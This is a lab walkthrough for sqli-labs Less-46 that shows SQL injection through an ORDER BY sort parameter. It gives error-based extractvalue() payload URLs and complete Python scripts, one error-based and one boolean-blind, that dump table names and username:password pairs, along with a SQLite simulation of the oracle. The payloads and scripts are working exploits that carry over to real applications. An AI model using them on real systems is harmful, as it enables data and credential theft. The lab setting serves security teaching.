sqli-labs-master Level 46: injection through the ORDER BY clause (sort parameter)

1. Error-based injection (extractvalue). The sort parameter is placed straight into the ORDER BY clause, where any expression is evaluated; wrapping a subquery in extractvalue() makes MySQL raise an XPATH syntax error whose message echoes the subquery result:

Database name:

http://127.0.0.1/Less-46/index.php?sort=(extractvalue(1,concat(0x7e,(select%20database()%20),0x7e)))

Current database user:

http://127.0.0.1/Less-46/index.php?sort=(extractvalue(1,concat(0x7e,(select%20user()%20),0x7e)))

Table names:

http://127.0.0.1/Less-46/index.php?sort=(extractvalue(1,concat((select%20group_concat(0x7e,table_name,0x7e)%20from%20information_schema.tables%20where%20table_schema=%27security%27))))

The XPATH error message produced by extractvalue() shows at most 32 characters, so a longer result has to be read out in pieces with substr(). Note that the third argument of substr() is a length, not an end position, and that the leading 0x7e marker uses up one of the 32 characters, so each request reveals 31 characters of the result. The payload below continues from character 32:
http://127.0.0.1/Less-46/index.php?sort=(extractvalue(1,concat(0x7e,substr((select%20group_concat(0x7e,table_name,0x7e)%20from%20information_schema.tables%20where%20table_schema=%27security%27),32,64))))

Column names of the users table:

http://127.0.0.1/Less-46/index.php?sort=(extractvalue(1,concat((select%20group_concat(0x7e,column_name,0x7e)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27))))

Data in the users table:

The concatenated result is longer than one error message, so we read it in chunks.

Characters 1-31 (substr(...,1,32) asks for 32, but the error shows only 31 after the 0x7e marker):

http://127.0.0.1/Less-46/index.php?sort=(extractvalue(1,concat(0x7e,substr((select%20group_concat(username,0x3a,password)%20from%20users),1,32))))

Characters 32 onward (substr(...,32,64) starts at offset 32 and requests 64 characters, of which the error again shows only 31; a third chunk would start at offset 63):

http://127.0.0.1/Less-46/index.php?sort=(extractvalue(1,concat(0x7e,substr((select%20group_concat(username,0x3a,password)%20from%20users),32,64))))
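The chunking above can be automated so that consecutive requests line up exactly. The following Python is an added example, not code from the original post or from sqli-labs: it builds the extractvalue()/substr() payloads with a 31-character window, parses the leaked fragment out of the XPATH error text, and reassembles the value. The target is a stand-in function (fake_target) that only models MySQL's 32-character truncation of the error message; SAMPLE_VALUE is a constructed string, not real lab data. To run it against the lab, pass a function that performs the HTTP request with the payload in the sort parameter and returns the response body.

```python
import re

# MySQL echoes at most 32 characters of the offending string in an XPATH syntax
# error, and one of them is spent on the 0x7e marker we prepend.
XPATH_ERROR_LIMIT = 32
WINDOW = XPATH_ERROR_LIMIT - 1

ERROR_RE = re.compile(r"XPATH syntax error: '~([^']*)'")

# Constructed stand-in for group_concat(username,0x3a,password) from the lab;
# not real lab output.
SAMPLE_VALUE = ("Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,"
                "secure:crappy,stupid:stupidity")


def build_payload(expr, offset):
    """Value for the sort= parameter that leaks WINDOW characters of expr,
    starting at the 1-based position offset."""
    return f"(extractvalue(1,concat(0x7e,substr(({expr}),{offset},{WINDOW}))))"


def parse_xpath_error(body):
    """Return the text after the '~' marker in the error message, or None if
    the response carries no XPATH error at all."""
    m = ERROR_RE.search(body)
    return m.group(1) if m else None


def fake_target(payload, value=SAMPLE_VALUE):
    """Stand-in for the lab server (assumption: it models only the substr() and
    the 32-character truncation). Reads offset and length back out of the payload."""
    m = re.search(r",(\d+),(\d+)\)\)\)\)$", payload)
    if not m:
        raise ValueError("unexpected payload shape")
    offset, length = int(m.group(1)), int(m.group(2))
    leaked = ("~" + value[offset - 1:offset - 1 + length])[:XPATH_ERROR_LIMIT]
    return f"<pre>XPATH syntax error: '{leaked}'</pre>"


def dump_via_error(expr, send=fake_target):
    """Reassemble the full value of expr by stepping the offset by WINDOW, so
    each error message continues exactly where the previous one stopped."""
    out = ""
    offset = 1
    while True:
        fragment = parse_xpath_error(send(build_payload(expr, offset)))
        if not fragment:
            break                   # past the end: substr() returned ''
        out += fragment
        if len(fragment) < WINDOW:
            break                   # short fragment: this was the last chunk
        offset += WINDOW
    return out


if __name__ == "__main__":
    print(dump_via_error("select group_concat(username,0x3a,password) from users"))
```

The regex assumes the leaked data contains no single quote; if a password can contain one, match on the closing quote of the full error line instead.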

2. Boolean-based blind injection

The oracle is the row order itself: sort=if(cond,id,username) makes MySQL order by id when cond is true, so the first row is Dumb (id 1), and by username when it is false, so a different user comes first. Each character is then found by binary search on its ASCII value. Python script:

import requests
from bs4 import BeautifulSoup


def get_username(resp):
    """
    Extract the username of the FIRST row of the result table from the response
    :param resp: response body (HTML)
    :return: username of the first data row, or "" if none was found
    """
    soup = BeautifulSoup(resp, 'html.parser')
    # The lab prints one <tr> per row with <td> cells in the order id, username,
    # password; the first <tr> that actually has <td> cells is the first data row.
    for row in soup.find_all('tr'):
        cells = row.find_all('td')
        if len(cells) >= 2:
            return cells[1].get_text(strip=True)
    return ""


def send_request(payload):
    """
    Send an HTTP request
    :param payload: full request URL
    :return: response object, or None on a network error
    """
    try:
        resp = requests.get(payload, timeout=5)
        return resp
    except requests.RequestException as e:
        print(f"Request failed: {e}")
        return None


def inject(url, query_template):
    """
    Generic boolean-blind extraction: binary-search each character.
    The template's condition must order by id when true (first row = Dumb)
    and by username when false (first row != Dumb).
    :param url: target URL (ending in '?')
    :param query_template: injection template with {i} and {mid} placeholders
    :return: the extracted string
    """
    data = ''
    i = 1
    while True:
        # Search the printable ASCII range. The lower bound is 31 rather than 32
        # so that a space (32) is distinguishable from the end of the string,
        # where ascii('') is 0 and every '> mid' test is false.
        left = 31
        right = 127
        while left < right:
            mid = (left + right) // 2
            query = query_template.format(i=i, mid=mid)
            payload = f"{url}{query}"
            resp = send_request(payload)
            if resp and 'Dumb' == get_username(resp.text):
                left = mid + 1      # ascii(char) > mid
            else:
                right = mid         # ascii(char) <= mid, or no character at all
        if left == 31:
            break                   # no character at position i: end of string
        data += chr(left)
        i += 1
    return data


def inject_database(url):
    """
    Get the database name
    :param url: target URL
    """
    query_template = "sort=if(ascii(substr(database(),{i},1))>{mid},id,username) -- "
    database_name = inject(url, query_template)
    print(f"Database name: {database_name}")


def inject_tables(url):
    """
    Get all table names of the current database
    :param url: target URL
    """
    query_template = "sort=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid},id,username) -- "
    tables = inject(url, query_template)
    print(f"Tables: {tables}")


def inject_column(url, table_name):
    """
    Get all column names of the given table
    :param url: target URL
    :param table_name: table name
    """
    query_template = f"sort=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='{table_name}'),{{i}},1))>{{mid}},id,username) -- "
    columns = inject(url, query_template)
    print(f"Columns of table {table_name}: {columns}")


def inject_data(url, table_name):
    """
    Dump the username/password pairs of the given table
    :param url: target URL
    :param table_name: table name
    """
    query_template = f"sort=if(ascii(substr((select group_concat(username,':',password) from {table_name}),{{i}},1))>{{mid}},id,username) -- "
    user_data = inject(url, query_template)
    if user_data == "":
        print("The table contains no data!")
    else:
        print(f"Data in table {table_name} as username:password: {user_data}")


def main():
    """
    Entry point
    """
    url = 'http://127.0.0.1/Less-46/index.php?'

    # Get the database name
    inject_database(url)

    # Get the table names
    inject_tables(url)

    # Once the table names are known, ask which table to dump
    table_name = input("Enter the table to dump: ")

    # Get the table's column names
    inject_column(url, table_name)

    # Get the table's data
    inject_data(url, table_name)


if __name__ == '__main__':
    main()
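To see why the if(cond,id,username) trick works as an oracle, and to test the binary search without a running lab, here is an added example (not from the original post or from sqli-labs) that reproduces the vulnerable ORDER BY query in an in-memory SQLite database. SQLite has no if() or ascii(), so the injected expression uses CASE WHEN ... END and unicode() instead; the rows are constructed and are not the lab's real table. The oracle is the same as in the script above: the first row is Dumb only when the condition is true and the rows are sorted by id.

```python
import sqlite3

# Constructed rows standing in for the lab's security.users table (not real lab data).
# 'Angelina' sorts before 'Dumb' under ORDER BY username, so the first row changes
# with the injected condition; 'pass word' exercises the space/end-of-string case.
ROWS = [
    (1, "Dumb", "Dumb"),
    (2, "Angelina", "I-kill-you"),
    (3, "Dummy", "p@ssword"),
    (4, "secure", "pass word"),
]


def make_db():
    """Build the in-memory stand-in for the lab database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_query(conn, sort):
    """Models Less-46: the sort parameter is concatenated straight into ORDER BY."""
    return conn.execute(
        f"SELECT id, username, password FROM users ORDER BY {sort}").fetchall()


def oracle(conn, cond):
    """True iff the injected condition held: the rows were ordered by id, so
    Dumb (id 1) comes first. Otherwise ORDER BY username puts Angelina first."""
    rows = vulnerable_query(conn, f"CASE WHEN {cond} THEN id ELSE username END")
    return rows[0][1] == "Dumb"


def extract(conn, expr):
    """Leak the string value of a SQL expression one character at a time by
    binary search over the oracle (same algorithm as the page's inject())."""
    out = ""
    i = 1
    while True:
        # Lower bound 31: past the end of the string substr() returns '' and
        # unicode('') is NULL, which coalesce() turns into 0, so every test is
        # false and the search settles on 31; a real space (32) still converges
        # to 32 and is kept.
        lo, hi = 31, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"coalesce(unicode(substr(({expr}),{i},1)),0) > {mid}"
            if oracle(conn, cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 31:
            break
        out += chr(lo)
        i += 1
    return out


if __name__ == "__main__":
    db = make_db()
    print(extract(db, "select password from users where id=4"))
```

Against the real lab the only changes are the condition syntax (if()/ascii() as in the script above) and replacing vulnerable_query() with the HTTP request; the oracle and the search loop stay the same.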
